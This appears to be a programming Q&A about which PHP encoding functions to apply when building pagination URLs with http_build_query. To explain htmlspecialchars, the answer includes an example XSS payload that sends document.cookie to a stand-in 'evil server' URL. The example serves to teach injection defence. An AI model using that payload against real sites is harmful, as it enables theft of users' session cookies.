phpurlencodehtmlspecialchars

How To Use http_build_query With Encodings?


I am trying to build a Pagination Section, like you see on Google Search Result Pages. Example: Page: 12345678910

Building the pagination section using http_build_query. I am not sure if I put the encodings in the right places or not. urlencode(), intval(), htmlspecialchars().

Url looks like this: https://localhost/search.php?search=cars&table=links&column=keyword&max=10&page=1

<?php

$row_count = 10;
$total_pages = ceil($row_count/$_GET['max']);
$selfpage = rawurlencode(basename(__FILE__)); //Is rawurlencode() ok here ?

$query_params = array(
    'search' => urlencode($_GET['search']),
    'table' => urlencode($_GET['table']),
    'column' => urlencode($_GET['column']),
    'max' => intval($_GET['max']),
    'page_no' => intval($_GET['page_no'])
    
);

for ($i = 1; $i <= $total_pages; $i++) {
    
    $url = $selfpage . "?" . http_build_query($query_params);
    echo '<a href="' . htmlspecialchars($url) . '">'; //Is htmlspecialchars() ok here ?

    if ($_GET['page_no'] == $i) 
    { 
        echo '<b>' . intval($i) . '</b>'; //Is intval() ok here ?
    } 
    else 
    {
        echo intval($i); //Is intval() ok here ?
    }

    echo '</a>';
}

?>

On which lines I am worried that I might have gone wrong, I have written comments asking if I did that particular line correct or not. Kindly, notice the comments.

I don't want to be double encoding either. If I got things wrong then I'd appreciate if someone can edit my code and show me how I should have done it.

Thanks


Solution

  • $selfpage = rawurlencode(basename(__FILE__)); //Is rawurlencode() ok here ?
    

    Using rawurlencode() here is unnecessary. It can't hurt, but it is intended to make text safe for use in URLs if it contains unsafe characters. Your file is named search.php which does not need encoding.

    Using rawurlencode() would be useful if you have special characters in your file name, like a space or accented characters.

    $query_params = array(
        'search' => urlencode($_GET['search']),
        'table' => urlencode($_GET['table']),
        'column' => urlencode($_GET['column']),
        'max' => intval($_GET['max']),
        'page_no' => intval($_GET['page_no'])
    );
    
    // and
    $url = $selfpage . "?" . http_build_query($query_params);
    

    http_build_query() already takes care of URL-encoding. You should not manually use urlencode() on values that you will pass through http_build_query() later. This will lead to double-escaping.

    Let's say someone accesses your page using ?search=a%2Fb. $_GET['search'] will be "a/b". Passing that through urlencode() will turn $query_params['search'] into "a%2Fb". But passing that through http_build_query() will see the % sign as needing escaping, so $url will contain search=a%252Fb.

    You don't want that, so don't use urlencode().

    The intval() usage is not strictly necessary, but it can't hurt either. It sanitizes the user input to a number, but you're not using the max and page_no values from the $query_params anywhere. In all places where you use those values as an integer value, you're still using the raw values from $_GET (in the calculation for $total_pages and to check for the current page within the loop). Using intval() there would make more sense than using it here in $query_params.

    echo '<a href="' . htmlspecialchars($url) . '">'; //Is htmlspecialchars() ok here ?
    

    htmlspecialchars() is used to prevent script injection. Using it on a URL you're building yourself in a sanitized way is not necessary.

    Use htmlspecialchars() if you're displaying user input on your page, for example:

    You've searched for "<?php echo $_GET['search']; ?>".
    

    If you have something like that, a user could theoretically visit your page and inject some Javascript code using, for example, ?search=<script>fetch('https://my-evil-server.com/store-cookies.php?cookie=' + document.cookie);</script> (properly URL-escaped of course, this is just for readability).

    Obviously, just stealing your own cookies is pointless. But what if you save the value of $_GET['search'] into a database and show it to other, logged in, users? Then this would cause the cookies of those other users to be sent to this malicious user. Not good.

    Using htmlspecialchars() will prevent this:

    You've searched for "<?php echo htmlspecialchars($_GET['search']); ?>".
    

    Now, at the very least, the < and > characters will be replaced by &lt; and &gt;, which means that piece of javascript will be presented on the page as human-readable text, instead of browser-executable code. It will look stupid, but at least you're not sending your users' cookies to a hacker.

    for ($i = 1; $i <= $total_pages; $i++) {
        echo intval($i); //Is intval() ok here ?
    }
    

    Here, intval() is completely unnecessary. $i is already an integer value, so intval() will do nothing.

    So cleaned up, your final code could look something like this:

    <?php
    
    $row_count = 10;
    $total_pages = ceil($row_count/$_GET['max']);
    $selfpage = basename(__FILE__);
    
    $query_params = array(
        'search' => $_GET['search'],
        'table' => $_GET['table'],
        'column' => $_GET['column'],
        'max' => $_GET['max'],
        'page_no' => $_GET['page_no']
    );
    
    for ($i = 1; $i <= $total_pages; $i++) {
        // I noticed you removed this in your last edit, but without it
        // you will just output the same URL for every page
        $query_params['page_no'] = $i;
        
        $url = $selfpage . "?" . http_build_query($query_params);
        echo '<a href="' . $url . '">';
    
        if ($_GET['page_no'] == $i) 
        { 
            echo '<b>' . $i . '</b>';
        } 
        else 
        {
            echo $i;
        }
    
        echo '</a>';
    }